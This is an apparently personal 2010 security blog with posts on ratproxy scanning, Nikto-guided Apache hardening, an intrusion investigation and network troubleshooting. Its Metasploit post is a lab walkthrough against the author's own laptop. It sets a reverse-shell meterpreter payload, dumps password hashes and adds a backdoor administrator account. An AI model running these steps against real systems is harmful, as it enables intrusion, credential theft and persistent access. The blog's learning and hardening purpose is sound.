Wednesday, February 3, 2010

ratproxy - xss vulnerable scanner

[size=6][color=Red][b]ratproxy[/b][/color][/size]

Ratproxy is a tools use to scan the web vulnerable. The author of the ratproxy is Michal Zalewski, who is the famous greyhat in europe, the p0f also created by him as well.

The way of ratproxy works is act as proxy in between your browser and server. Then capture the all transaction from both sides. See below : -

browser --- ratproxy --- server

Requirement:
make the life easier, get a BT4. Then, boot the live CD will do

login = root password = toor


change directory to /pentest/web/ratproxy
root@bt:/#cd /pentest/web/ratproxy

make a directory for trace file create by ratproxy later root@bt:/pentest/web/ratproxy# mkdir /root/ratproxy

Then, run the ratproxy root@bt:/pentest/web/ratproxy# ./ratproxy -v /root/ratproxy/ -w e.log -d xxxxx.com.my -XCl2efxiscmg -p 8080 ratproxy version 1.58-beta by lcamtuf@google.com]lcamtuf@google.com Proxy configured successfully. Have fun, and please do not be evil. WARNING: Disruptive tests enabled. use with care. [+] Accepting connections on port 8080/tcp (local only)...

Simple explantion:
-v the directory i want to store the trace files
-w create a log file based on this project
-d xxxx.com.my is refer to my domain name
-p 8080 is the proxy port

for other parameters,please refer to http://code.google.com/p/ratproxy/wiki/RatproxyDoc
cause it is a bit longer



then, set up browser point to the proxy..Because i testing in my own box. So i use local host,port 8080 will do




go to that website,then login to that site。
after login you have to visit every single pages of this site.
for this example, i only visited for few pages


root@bt:/pentest/web/ratproxy# ./ratproxy -v /root/ratproxy/ -w e.log -d e-market.com.my -XCl2efxiscmg -p 8080
ratproxy version 1.58-beta by
lcamtuf@google.com]lcamtuf@google.com
Proxy configured successfully. Have fun, and please do not be evil.
WARNING: Disruptive tests enabled. use with care.
[+] Accepting connections on port 8080/tcp (local only)...
^C
back to this console, press CTRL+C to stop the ratproxy once you finish visit all the pages



Generate the html report
root@bt:/pentest/web/ratproxy# ./ratproxy-report.sh e.log > ratproxy_report.html
root@bt:/pentest/web/ratproxy# ls -lah ratproxy_report.html
-rw-r--r-- 1 root root 61K Jan 14 14:41 ratproxy_report.html




Then, open the browser to read the html report
see the screenshot, it can be categorized as few severity.
You can click the VIEW TRACE to see the whole process
also can click the EDIT to edit value。



look, the result of VIEW TRACE。
you can see the transaction from user browser to server


how is this tools ? coolz ??
this tool is used by Google as well.

Tuesday, February 2, 2010

metaspoilt [ms08_067] - conflicker

still remember the conflicker ? what is the damage to your company when this things spread out??

ms08-067 is a patches to prevent conflicker.
here im going to attack the machine which dont patches the ms08-067 by using metaspoilt.

requirement:-

system = ubuntu 9.10

apps = metaspoilt

(i dont/wont show how to install metaspoilt in ubuntu, as system admin,you guy please figure out by yourself. )


To execute msf,

#./opt/metaspoilt/msfconsole

then call the exploit module:

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.19
RHOST => 192.168.1.19
noted:RHOST is remote host,meaning your victim

msf exploit(ms08_067_netapi) > set LHOST 192.168.1.17
LHOST => 192.168.1.17
noted:LHOST is local host,the box you running msf

msf exploit(ms08_067_netapi) > set LPORT 4444
LPORT => 4444
note:LPORT is local port,the port you want to use. we use 4444 as example

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp
note:set the payload to do attack

msf exploit(ms08_067_netapi) > exploit
note: exploit the victim host


  • Started reverse handler on port 4444
  • Automatically detecting the target…
  • Fingerprint: Windows XP Service Pack 2 – lang:English
  • Selected Target: Windows XP SP2 English (NX)
  • Triggering the vulnerability…
  • Sending stage (725504 bytes)
  • Meterpreter session 1 opened (192.168.1.17:4444 -> 192.168.1.19:1442)
  • note:see the last line ??you successful created the session between your box and victim's box

    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    note:getuid to see the system

    meterpreter > run hashdump


  • Obtaining the boot key…
  • Calculating the hboot key using SYSKEY bb35d43e0a531b188967bb43ce0f4823…
  • Obtaining the user list and keys…
  • Decrypting user keys…
  • Dumping password hashes…

    Administrator:500:281b94b1e665a2b2aad3b435b51404ee:361db25d1614b529c719205dfc0d7420:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    HelpAssistant:1000:5416885c50a87bdd115df056849a0a33:62a470b79584552188d83ce96f2482b2:::
    SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:aff70073db96549d5ecceb973af24bcc:::
    chenghui:1003:08fd436b7baa45341b4d308d3f102048:f7cabbe13fd7b71848064cbb40c5c13e:::
    ASPNET:1004:7bb95a870045309f8d5f5b133fbbefd5:38982698a41a6030a410d68d50428bf3:::
    admin:1011:08fd436b7baa45341b4d308d3f102048:f7cabbe13fd7b71848064cbb40c5c13e:::
    __vmware_user__:1013:c9d38fa38122a3212d28a90ef0e5c0c5:3f06c5556c2f5aaeeb4cb499ab9681e7:::

    note:run hashdump, i had dumped all user account's hash key。
    if you do not want to add new account into this host,think how to break the hash。
    tips: cain and abel

    meterpreter > shell
    Process 4288 created.
    Channel 2 created.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    note:issue shell command. i owned the shell。 hehe

    C:\WINDOWS\system32>ipconfig
    ipconfig

    Windows IP Configuration

    Ethernet adapter VMware Network Adapter VMnet8:

    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 192.168.81.1
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . :

    Ethernet adapter VMware Network Adapter VMnet1:

    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 192.168.136.1
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . :

    Ethernet adapter Wireless Network Connection:

    Media State . . . . . . . . . . . : Media disconnected

    Ethernet adapter VirtualBox Host-Only Network:

    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 192.168.56.1
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . :

    Ethernet adapter Local Area Connection:

    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 192.168.1.19
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : 192.168.1.1
    note:ipconfig, it's works。


    C:\WINDOWS\system32>net user a13x P@ssw0rd /add
    net user a13x P@ssw0rd /add
    The command completed successfully.
    note:i try to add adduser。 ^^ please practice the windows command。

    C:\WINDOWS\system32>net localgroup Administrators a13x /add
    net localgroup Administrators a13x /add
    The command completed successfully.
    note:i add myself into administrators group。 damn eveil

    you can play with this host with windows command like net view ,net use, tasklist ,taskkill, net service and etc.
    please practice more with windows command

    the victim is my laptop , running with windows xp sp2, windows firewall on, mcafee disabled。

  • ENJOY HACKING, please do not harm other ppl because this is misuse of computer. You can be send to jail !!

    Monday, January 4, 2010

    how secure of your apache server???

    [root@manutd nikto-2.1.0]# ./nikto.pl -c all -host 192.168.1.15
    - Nikto v2.1.0/2.1.0
    ---------------------------------------------------------------------------
    + Target IP: 192.168.1.15
    + Target Hostname: 192.168.1.15
    + Target Port: 80
    + Start Time: 2009-11-23 0:02:00
    ---------------------------------------------------------------------------
    + Server: Apache/2.2.13 (Fedora)
    + OSVDB-0: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
    + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
    + OSVDB-0: Apache/2.2.13 appears to be outdated (current is at least Apache/2.2.14). Apache 1.3.41 and 2.0.63 are also current.
    + OSVDB-3268: /icons/: Directory indexing is enabled: /icons
    + OSVDB-3233: /icons/README: Apache default file found.
    + 3582 items checked: 5 item(s) reported on remote host
    + End Time: 2009-11-23 0:02:00 (18 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested



    ========== after mod_security installed ===========================
    [root@manutd nikto-2.1.0]# ./nikto.pl -C all -host 192.168.1.15
    - Nikto v2.1.0/2.1.0
    ---------------------------------------------------------------------------
    + Target IP: 192.168.1.15
    + Target Hostname: 192.168.1.15
    + Target Port: 80
    + Start Time: 2009-11-23 0:08:00
    ---------------------------------------------------------------------------
    + Server: Apache/2.2.0 (Fedora)
    + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
    + OSVDB-0: Apache/2.2.0 appears to be outdated (current is at least Apache/2.2.14). Apache 1.3.41 and 2.0.63 are also current.
    + 3582 items checked: 2 item(s) reported on remote host
    + End Time: 2009-11-23 0:09:00 (55 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested



    ======== after apache config tuned ===============
    [root@manutd nikto-2.1.0]# ./nikto.pl -C all -host 192.168.1.15
    - Nikto v2.1.0/2.1.0
    ---------------------------------------------------------------------------
    + Target IP: 192.168.1.15
    + Target Hostname: 192.168.1.15
    + Target Port: 80
    + Start Time: 2009-11-23 0:22:00
    ---------------------------------------------------------------------------
    + Server: Apache
    + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
    + 3582 items checked: 1 item(s) reported on remote host
    + End Time: 2009-11-23 0:23:00 (57 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested



    ========== last modification =============
    [root@devil nikto-2.1.0]# ./nikto.pl -C all -host 192.168.1.15

    - Nikto v2.1.0/2.1.0
    ---------------------------------------------------------------------------
    + Target IP: 192.168.1.15
    + Target Hostname: 192.168.1.15
    + Target Port: 80
    + Start Time: 2009-11-23 0:57:00
    ---------------------------------------------------------------------------
    + Server: This is Windows IIS 10. Enjoy hacking
    + 3582 items checked: 0 item(s) reported on remote host
    + End Time: 2009-11-23 0:58:00 (45 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested



    see , Windows IIS 10, Enjoy Hacking :P

    Intruders cant guess what is my server platform, but they still can grab my webpage header.
    Maybe they can guess from my webpage header.


    see, nothing to be found.... i just do a basic modification in apache and mod_security.
    For more advance topics in mod_security, please read below 2 books. It is very useful for apache
    Apache Security by Ivan Ristic
    The Definitive Guide to Apache mod_rewrite by Rich Bowen


    Actually i have to do more advance web vulnerable testing because tested with 1 tools is not enough. It is dangerous if the production server only done with 1 tools for pen test.


    hopefully i got time to do more advance pentest with various open source web scanner also proprietary product like NESSUS

    Pentoo, another security distro

    Pentoo, another security distro which intro by my china friend who playing Back Track with me along.

    i had tested with my EEEPC 1005HA, it is very fast compared to BT4. Of coz BT4 is slower due to the x windows client is KDE3.x.

    There's 2 things really impressed me which are latest kernel 2.6.32 and 2x CUDA Apps. The advantages of new kernel is more driver supported and i can use EXT4, i like this File System pretty much due to better performance. Yet, the CUDA Apps really make use the processing speed of CUDA, it is really good in brute force.

    There's a GUI thingy called Fast Track Web Interface to allow people who are not familiar with linux have better life to play with this tools. This kind of GUI thingy also available in other security distro like NST.

    I plan to install the Pentoo in my eeepc ,but my china friend ask me to wait for BT4 due to Bt4 final will release in this month. As i see from current development, the BT4 will come with Kernel 2.6.29 and my eeepc wireless card is able to detected automatically. I can install it thru source code but look like not so PERFECT already.

    Well, let see what happen in BT4 after release.

    Please see the Pentoo screenshot which i took by vmware


    Sunday, January 3, 2010

    1st blog of 2010 - CUDA enabled GPGPU

    this is my 1st blog in 2010 after i stopped blogging for almost half year.

    As we know the brute force attack is required high speed processing power in order to achieve it.
    but nowadays brute force attack can be done a normal home use PC. Thanks to NVIDIA who make the CUDA chipset to speed up the calculation of processing speed.

    1 years ago, i dont see many of the CUDA based applications available in internet. With the effort of programmers, they had done some CUDA apps for brute force which is available in BackTrack 4 and Pentoo security distro.

    Recently, ASUS has announced their home made super computer which is powered by CUDA GPGPU. It is very cheap like 200-300 USD per teraflops

    As we can see, more and more CUDA based applications will be available soon. It is good because the calculation speed is speed up and the price is lower down whereas It is bad for people who have evil mindset.

    Nothing to be safe if CUDA really make use in the our life. Any crypto can be decrypt within very few minutes or less.

    Tuesday, June 9, 2009

    server compromised - finding the intruder

    Today received a call from someone who told me his customer server has been compromised which setup by me since almost 1 year ago.

    Ask my favor to do some checking.

    according to him, the intruder left 3 files into one of the web directory.
    2 is text files and another 1 is an application.
    i had check these 2 text files which are harmless code and the application is eggdrop which is IRC Bot application.

    since i know it is eggdrop, i see where the files has been installed.
    [root@www ~]# find / -name egg*
    /var/www/html/crew/libraries/x/conf/eggdrop.chan
    /var/www/html/crew/libraries/x/doc/html/egg-core.html
    /var/www/html/crew/libraries/x/doc/man1/eggdrop.1
    /var/www/html/crew/libraries/x/doc/eggdrop.doc
    /var/www/html/crew/libraries/x/eggdrop-1.6.6
    /var/www/html/crew/libraries/x/logs/eggdrop.log.20090608
    /var/www/html/crew/libraries/x/logs/eggdrop.log.20090606
    /var/www/html/crew/libraries/x/logs/eggdrop.log.20090607
    /var/www/html/crew/libraries/x/logs/eggdrop.log.20090609
    /usr/share/pixmaps/gnobots2/eggs.png
    /usr/lib/python2.4/site-packages/gtk-2.0/egg
    from the result result i found out the application installed on /var/www/html/crew/libraries/


    Now, see when the application install on the server
    [root@www ~]# ls -la /var/www/html/crew/libraries/
    -rwxr-xr-x 1 loon loon 16091 Nov 8 2008 unzip.lib.php
    -rwxr-xr-x 1 loon loon 6512 Nov 8 2008 url_generating.lib.php
    drwxr-xr-x 10 loon loon 4096 Jun 9 19:32 x
    -rw-r--r-- 1 loon loon 1868180 Jun 6 05:48 x.tar.gz
    -rwxr-xr-x 1 loon loon 6486 Nov 8 2008 zip.lib.php
    ----- --------------- more ----------------------------------------
    see the line with red color, hints is there.


    Now, go further... look at /var/log/html/crew/libraries/x
    [root@www x]# ls -la /var/www/html/crew/libraries/x
    total 2536
    drwxr-xr-x 10 loon loon 4096 Jun 9 19:32 .
    drwxr-xr-x 11 loon loon 4096 Jun 6 05:48 ..
    -rw-r--r-- 1 loon loon 0 Jun 9 22:23 av.db
    -rw-r--r-- 1 loon loon 71820 Jun 9 22:12 bs_data.eggdrop
    -rw-r--r-- 1 loon loon 71031 Jun 9 22:12 bs_data.eggdrop.bak
    drwxr-xr-x 2 loon loon 4096 Jun 6 05:54 conf
    -rw-r--r-- 1 loon loon 0 Aug 18 2006 cs_spam_word.conf
    drwxr-xr-x 5 loon loon 4096 Apr 5 2007 doc
    -rw-r--r-- 1 loon loon 1163288 Sep 6 2001 eggdrop-1.6.6
    drwxr-xr-x 3 loon loon 4096 Apr 5 2007 filesys
    drwxr-xr-x 4 loon loon 4096 Apr 5 2007 help
    -rw-r--r-- 1 loon loon 0 Aug 18 2006 klines
    drwxr-xr-x 2 loon loon 4096 Apr 5 2007 language
    drwxr-xr-x 2 loon loon 4096 Jun 9 00:01 logs
    -rw-r--r-- 1 loon loon 5 Jun 6 05:57 pid.eggthrone
    -rw-r--r-- 1 loon loon 465 Aug 18 2006 run
    drwxr-xr-x 2 loon loon 4096 Jun 6 05:49 scripts
    -rw-r--r-- 1 loon loon 14368 Feb 25 2004 shade
    drwxr-xr-x 2 loon loon 4096 Apr 5 2007 text
    -rwxrwxrwx 1 loon loon 1163288 Sep 6 2001 x
    -rw-r--r-- 1 loon loon 7745 Jun 6 05:49 x3
    -rwxr-xr-x 1 loon loon 21516 May 30 2007 xh
    see, most of them are 6th Jun 2009, i believe the application runs on that day. Yet, i also believe it is installed on the same day.

    The IRC Bot are runing by both same user and group, loon. Then, i talk to the user and he said he didnt share his account with anyone.

    let's see anyone inside the server or not
    [root@www x]# w
    20:03:13 up 167 days, 43 min, 4 users, load average: 0.00, 0.02, 0.00
    USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
    alex pts/2 118.100.121.74 17:51 2:10m 0.04s 0.03s sshd: alex [priv]
    loon pts/3 60.52.19.122 17:54 1:06m 0.02s 0.02s -bash
    alex pts/5 118.100.125.164 19:24 35:32 0.03s 0.01s sshd: alex [priv]
    alex pts/6 118.100.125.164 19:30 0.00s 0.08s 0.01s sshd: alex [priv]
    shit, someone inside and that user said he didnt login to the server. i believe this is intruder.

    i do whois and see where this IP address came from
    [root@www x]# whois 60.52.19.122
    [Querying whois.apnic.net]
    [whois.apnic.net]
    % [whois.apnic.net node-2]
    % Whois data copyright terms http://www.apnic.net/db/dbcopyright.html

    inetnum: 60.48.0.0 - 60.54.255.255
    netname: XDSLSTREAMYX
    descr: Telekom Malaysia Berhad
    descr: Network Strategy
    descr: Wisma Telekom
    descr: Jalan Pantai Baru
    descr: 50672 Kuala Lumpur
    country: MY
    from the return result , seems like the user from TMNET users.

    do the netstat to see what connection available now
    [root@www x]# netstat -an|more
    Active Internet connections (servers and established)
    Proto Recv-Q Send-Q Local Address Foreign Address State
    tcp 0 0 127.0.0.1:2208 0.0.0.0:* LISTEN
    tcp 0 0 0.0.0.0:804 0.0.0.0:* LISTEN
    tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN
    tcp 0 0 0.0.0.0:6667 0.0.0.0:* LISTEN
    tcp 0 0 0.0.0.0:44526 0.0.0.0:* LISTEN
    tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN
    tcp 0 0 0.0.0.0:10000 0.0.0.0:* LISTEN
    tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN
    tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN
    tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN
    tcp 0 0 127.0.0.1:2207 0.0.0.0:* LISTEN
    tcp 0 0 203.114.11.102:51646 194.14.236.50:6667 ESTABLISHED
    tcp 0 0 203.114.11.102:55317 202.30.50.120:43 ESTABLISHED
    tcp 0 0 :::8897 :::* LISTEN
    --------------------------- more ---------------------------------------------------
    see the line with red color, see the port 6667, which is IRC port.


    now try whois that IP
    [root@www x]# whois 194.14.236.50
    [Querying whois.ripe.net]
    [whois.ripe.net]
    % This is the RIPE Whois query server #2.
    % The objects are in RPSL format.
    %
    % The RIPE Database is subject to Terms and Conditions.
    % See http://www.ripe.net/db/support/db-terms-conditions.pdf

    % Note: This output has been filtered.
    % To receive output for a database update, use the "-B" flag

    % Information related to '194.14.236.0 - 194.14.236.255'

    inetnum: 194.14.236.0 - 194.14.236.255
    netname: DALNET-2
    descr: DALnet unrouted servers
    remarks: ################################################
    remarks: If you get scanned by 194.14.236.50 you are NOT
    ---------------------------- more ------------------------------------------------
    it is dalnet server.
    lol, The intruder must be malaysian because malaysian very very like dalnet IRC.
    i'm one of them in N year ago.

    go further to see the port 6667.
    [root@www alex]# lsof -i tcp:6667
    COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
    x 2709 loon 6u IPv4 37479003 TCP 203.114.11.102:51646->pool.dal.net:ircd (ESTABLISHED)
    lsof is coolz..
    found out the PID is 2709 and user is loon.
    that mean the x is executed by loon and PID is 2709.
    application is x

    now use ps command to see the x
    [root@www ~]# ps auxww |grep x
    root 409 0.0 0.0 0 0 ? S<>
    mysql 1006 0.0 1.0 143508 21536 ? Sl Jan08 1:14 /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --socket=/var/lib/mysql/mysql.sock
    root 1565 0.0 0.0 6744 1772 ? Ss Jan08 0:14 /usr/libexec/postfix/master
    postfix 1568 0.0 0.9 24980 19952 ? S Jan08 0:47 qmgr -l -t fifo -u
    root 2308 0.0 0.0 1672 404 ? Ss 2008 0:00 klogd -x
    loon 2709 0.0 0.2 8032 4152 ? S Jun06 0:01 -bash -m x3
    root 7579 0.0 0.0 1900 376 ? Ss 2008 0:00 gpm -m /dev/input/mice -t exps2
    root 7820 0.0 0.0 1752 448 ? S 2008 0:00 /var/ossec/bin/ossec-execd
    ------------------------------------------------ more ------------------------------------------------
    the process command showed that loon runs X since 6th Jun 2009.


    look at process 2709 by using netstat
    [root@www ~]# netstat -anp |grep 2709
    tcp 0 0 0.0.0.0:44526 0.0.0.0:* LISTEN 2709/-bash
    tcp 0 0 203.114.11.102:51646 194.14.236.50:6667 ESTABLISHED 2709/-bash
    udp 0 0 0.0.0.0:54629 0.0.0.0:* 2709/-bash
    it is listening my tcp and udp port and established my tcp port with port number 51646


    let see what loon doing now
    [root@www alex]# lsof -u loon
    COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
    x 2709 loon cwd DIR 9,3 4096 17892533 /var/www/html/crew/libraries/x
    x 2709 loon rtd DIR 9,0 4096 2 /
    x 2709 loon mem REG 9,0 11370676 /lib/libnss_files-2.5.so (path inode=11370543)
    x 2709 loon 3u IPv4 37478934 TCP *:44526 (LISTEN)
    sshd 24370 loon 3u IPv6 38236234 TCP 203.114.11.102:8897->52.60.in-addr.arpa.tm.net.my:newlixreg (ESTABLISHED)
    bash 24371 loon cwd DIR 9,3 4096 17860330 /var/www/html/www.aviocall.com/upload
    bash 24371 loon 255u CHR 136,3 5 /dev/pts/3
    it is too long. i had cut down most of them, left the important one.
    see the red line. see properly.
    he using Ipv6 connected to my server ???????????????
    and what he want to do over that upload directory?????

    let's see upload directory
    [root@www www.aviocall.com]# ls -la upload/
    total 113672
    drwxr-xr-x 6 loon loon 4096 Jun 9 23:01 .
    drwxr-xr-x 11 loon loon 4096 Jun 9 19:10 ..
    drwxr-xr-x 2 loon loon 4096 May 30 14:32 files
    drwxr-xr-x 2 loon loon 4096 May 30 14:33 images
    -rw-r--r-- 1 loon loon 111723227 Jun 9 12:56 Manual Patch 090609.exe
    -rw-r--r-- 1 loon loon 4521984 Jun 9 23:03 Manual Patch 090609.exe.1
    drwxr-xr-x 2 loon loon 4096 May 30 14:33 pdf
    drwxr-xr-x 2 loon loon 4096 Jun 4 00:41 programs
    [root@www www.aviocall.com]# date
    Tue Jun 9 23:03:54 MYT 2009
    look, the time of server and the date of file he modified.
    he is doing something. well, i dont mind..
    i want to monitor him now.

    see, what he doing..
    top - 23:05:48 up 167 days, 3:45, 4 users, load average: 0.01, 0.00, 0.00
    Tasks: 164 total, 2 running, 162 sleeping, 0 stopped, 0 zombie
    Cpu(s): 0.1%us, 0.1%sy, 0.0%ni, 99.8%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
    Mem: 2066076k total, 1617796k used, 448280k free, 215712k buffers
    Swap: 2096376k total, 120k used, 2096256k free, 1118104k cached

    PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
    2709 loon 15 0 8032 4188 1196 S 0.0 0.2 0:01.06 x
    10053 loon 15 0 7268 1696 1376 S 0.0 0.1 0:00.09 wget
    24370 loon 15 0 9892 1664 1112 S 0.0 0.1 0:00.56 sshd
    24371 loon 15 0 4528 1416 1200 S 0.0 0.1 0:00.03 bash
    using wget to get something from somewhere.

    see what he get from wget
    [root@www ~]# ps -afed|grep wget
    loon 10053 24371 0 23:01 pts/3 00:00:00 wget http://bayou.asiasoft.net/CABAL/pds/Manual%20Patch%20090609.exe
    root 10371 10342 0 23:13 pts/8 00:00:00 grep wget
    download CABAL online game's thingy.



    Monday, December 8, 2008

    simple command for troubleshoot the network applications

    most of time i do troubleshooting on the network application, these are few command i will use it with log as well.

    1st, netstat
    2nd, lsof

    From server itself, you can use the below command
    1st, netstat
    [root@www errs]# netstat -an|grep 3306
    tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN

    note: see the port is opening :P


    2nd, lsof
    [root@www errs]# lsof -i tcp:3306
    COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
    mysqld 7472 mysql 10u IPv4 12294 TCP *:mysql (LISTEN)

    see, you can see those port 3306 is used by service, mysqld
    and its PID is 7472
    then is USER is mysql and etc.


    especially lsof, it will tell you which application are bonded with the particular port.
    explore lsof more :P you will get more with this command



    from client you can try by localhost see whether the firewall is block it or not :P
    C:\Documents and Settings\a13x>telnet www.aviocall.com 3306
    Connecting To www.aviocall.com...Could not open connection to the host, on port
    3306: Connect failed

    see, it is failed to connect. i believe is my firewall block it.

    Let see the log form server.
    Dec 8 17:56:11 www kernel: Shorewall:net2all:DROP:IN=eth0 OUT= MAC=00:1e:68:9a:f6:19:00:13:7f:c4:47:1a:08:00 SRC=118.100.42.9 DST=203.114.11.102 LEN=48 TOS=0x00 PREC=0x00 TTL=113 ID=40540 DF PROTO=TCP SPT=50960 DPT=3306 WINDOW=65535 RES=0x00 SYN URGP=0
    Dec 8 17:56:15 www psad: scan detected: 118.100.42.9 -> 203.114.11.102 tcp: [3306] flags: SYN tcp pkts: 1 DL: 1
    see the log, the destination port is 3306 :P
    that mean my firewall block it :P

    so, the conclusion is mysql port 3306 only accessible by localhost or certain IP addresses :P


    that's all for this part. Once you know what is the root cause, then only you can perform the troubleshooting.


    another way , use sniffer like wireshark or tcpdump to troubleshoot it :P
    you can get more :P but i dont plan to teach as im not really good in wireshark and this is dangerous tools for people who have evil mindset :P